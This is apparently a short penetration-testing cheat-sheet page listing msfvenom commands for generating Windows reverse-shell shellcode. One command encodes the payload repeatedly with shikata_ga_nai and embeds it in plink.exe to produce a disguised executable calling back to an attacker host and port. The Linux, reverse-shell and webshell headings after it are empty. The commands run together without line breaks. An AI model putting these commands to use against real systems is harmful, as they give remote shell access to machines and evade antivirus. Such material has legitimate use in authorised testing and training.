Generate shellcodes
Windows
msfvenom -a x86 --platform Windows \
-p windows/shell_reverse_tcp \
-b '\x00\x40\x0a\x0d' \
-f python -v shellcode \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORTmsfvenom -p windows/shell_reverse_tcp -f exe \
-e x86/shikata_ga_nai -i 9 \
-x /usr/share/windows-binaries/plink.exe -o reverse.exe \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORTGenerate shellcode with specified size in python format
msfvenom -a x86 --platform windows \
-p windows/shell_reverse_tcp \
-b '\x00\x40\x0a\x0d' \
-s $PAYLOAD_SIZE \
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
| msfvenom -a x86 --platform Windows -f python -v shellcodeLinux
Reverse shell commands
If netcat is not on the target system:
Webshells
Commands
Last updated
Was this helpful?